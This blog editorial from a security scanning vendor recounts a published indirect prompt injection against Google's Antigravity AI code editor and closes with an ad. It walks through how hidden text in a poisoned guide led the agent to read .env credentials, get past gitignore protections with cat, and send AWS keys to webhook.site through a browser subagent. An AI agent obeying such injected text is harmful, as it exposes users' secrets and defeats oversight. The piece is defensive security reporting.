Independent Editorial
⚠️ IMPORTANT DISCLAIMER
The views, opinions, analysis, and projections expressed in this article are those of the author and do not necessarily reflect the official position, policy, or views of Bad Character Scanner™, its affiliates, partners, or associated entities. This content is provided for informational and educational purposes only and should not be considered as professional advice, official company statements, or guarantees of future outcomes.
All data points, timelines, and projections are illustrative estimates based on publicly available information and industry trends. Readers should conduct their own research and consult with qualified professionals before making decisions based on this content.
Bad Character Scanner™ disclaims any liability for decisions made based on the information presented in this article.
We've Been Screaming About IT. Now it Happened
Google's shiny new Antigravity AI code editor got pwned. Hard.
PromptArmor just published a devastating indirect prompt injection attack that makes Antigravity steal your credentials, bypass its own security settings, and exfiltrate everything to an attacker-controlled domain.
Here's how it goes:
- User asks Antigravity to help integrate Oracle ERP's new AI Payer Agents feature
- Antigravity reads a poisoned "implementation guide" found online
- Hidden prompt injection (in 1pt font!) tells Gemini to:
- Scrape credentials from
.env files
- Bypass its own gitignore protections using
cat terminal commands
- Build a malicious URL with your AWS keys URL-encoded as query parameters
- Spawn a browser subagent to visit the attacker-monitored URL
And the absolute kicker? The default URL allowlist includes webhook.site literally a domain designed for logging arbitrary HTTP requests.
Game over. Your AWS credentials are now in an attacker's webhook logs.
That makes a weaponized agentic AI with:
- Terminal command execution
- Browser automation tools
- Default configs that assume you'll "actively supervise" every agent action
Spoiler: You won't. That's literally why they built the Agent Manager interface to run multiple agents simultaneously in the background without constant human oversight.
Google addressed this with A disclaimer... ...
A warning screen during onboarding that says "don't operate on sensitive data" and "review every action."
"Given that the Agent Manager allows multiple agents to run without active supervision, we find it extremely implausible that users will review every agent action." — PromptArmor Research Team
This part is an Ad:
You know what would actually help? The kind of defensive scanning we built.
Try Bad Character Scanner →
Scan your codebase. Find the invisible threats. Detect prompt injections. Stop the exfiltration before it happens.

Related Reading
Editorial Standards Notice
This blog follows journalistic standards adapted for independent security research and commentary. Our content is based on publicly available sources and represents informed analysis rather than definitive fact-checking.
Corrections: If you believe any information in this article is inaccurate or requires correction, please submit your concern through our contact page with "Correction Request" in the subject line. Our editorial staff will review your submission and re-evaluate the facts as appropriate. We are committed to transparency and will update content when legitimate errors are identified.
Read more: Journalistic Standards | About the Blog